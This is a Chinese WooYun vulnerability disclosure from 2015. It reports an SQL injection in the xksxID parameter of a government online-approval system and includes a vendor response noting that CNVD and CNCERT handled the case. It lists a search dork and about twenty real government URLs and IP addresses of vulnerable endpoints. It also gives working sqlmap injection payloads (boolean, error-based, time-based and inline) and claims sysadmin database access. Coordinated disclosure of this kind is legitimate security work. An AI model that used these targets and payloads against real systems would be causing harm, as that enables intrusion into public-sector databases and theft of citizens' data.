当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119370

漏洞标题:某政务系统一处通用SQL注入漏洞(附众多政务案例)

相关厂商:邯郸市连邦软件发展有限公司

漏洞作者: 路人甲

提交时间:2015-06-10 11:59

修复时间:2015-09-13 10:54

公开时间:2015-09-13 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向第三方安全合作伙伴开放
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

某政务系统一处通用SQL注入漏洞(附众多政务案例)

详细说明:

系统开发厂商:邯郸市连邦软件发展有限公司
系统架构:ASPX+MSSQL
漏洞文件:workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
xksxID参数过滤存在问题,导致注入
关键字:inurl:workplate
部分政府案例:
日照市网上审批系统
http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
保定市网上审批系统
http://www.bdxzfw.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
磁县网上审批系统
http://www.cxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
魏县网上审批系统
http://wxxz.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
邯郸县网上审批系统
http://www.hdxzwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
城区网上审批系统
http://211.142.37.152:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
左云县网上审批系统
http://211.142.37.152:88/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
天镇县网上审批系统
http://211.142.37.154:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
广灵县网上审批系统
http://211.142.37.152:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
新荣区网上审批系统
http://183.203.128.238:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
矿区网上审批系统
http://211.142.41.114:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
涉县网上审批系统
http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
临漳县网上审批系统
http://www.lzxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
安新县网上审批系统
http://www.axxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
高阳县网上审批系统
http://gyxzfw.net/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
长子县网上审批系统
http://60.220.253.153:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
屯留县网上审批系统
http://60.220.240.7/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
浑源县网上审批系统
http://211.142.37.152:85/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
邱县网上审批系统
www.qxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
大同县网上审批系统
http://211.142.37.152:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
等等

漏洞证明:

漏洞验证:
http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=为例:

Place: GET
Parameter: xksxID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xksxID=928 AND 8078=8078&baseorg=209
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
(IN)
    Payload: xksxID=928 AND 1288 IN ((CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR
(58) (SELECT (CASE WHEN (1288=1288) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) C
HAR(98) CHAR(115) CHAR(109) CHAR(58)))&baseorg=209
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: xksxID=928 AND 2613=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
 AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7)&baseorg=209
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: xksxID=(SELECT CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR(58) (SELE
CT (CASE WHEN (4478=4478) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(98) CH
AR(115) CHAR(109) CHAR(58))&baseorg=209
---


11.png


SA权限:

11.png


其他如上!

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-15 10:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。

最新状态:

暂无